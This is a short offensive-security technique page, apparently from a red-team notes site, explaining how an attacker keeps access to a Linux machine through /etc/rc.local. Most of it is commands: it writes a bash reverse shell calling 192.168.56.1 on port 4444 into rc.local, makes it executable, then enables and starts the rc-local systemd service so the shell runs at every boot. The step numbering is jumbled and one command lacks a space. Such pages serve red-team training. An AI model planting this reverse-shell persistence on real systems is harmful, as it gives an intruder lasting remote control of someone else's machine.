redttps

Persistence with rc.local (Linux)

Description

The rc.local file is a legacy method for executing scripts at boot time. Although deprecated in some distributions, it’s still supported in many environments. By adding a reverse shell command to this file, the attacker ensures execution during startup. If rc.local is missing, they may create it and register it as a systemd service to maintain compatibility

Steps

  1. Create or repair the following file
    2. sudo nano /etc/rc.local
  2. Add the desired code; this is just an example, it is not stealthy
    3. #!/bin/bash
 bash-i >& /dev/tcp/192.168.56.1/4444 0>&1 & exit 0
  3. Grant execution permissions
    4. sudo chmod +x /etc/rc.local
  4. Enable and start the service
    5. sudo systemctl daemon-reload
sudo systemctl enable rc-local
sudo systemctl start rc-local
  5. Check the service status and restart
    6. sudo systemctl status rc-local
sudo reboot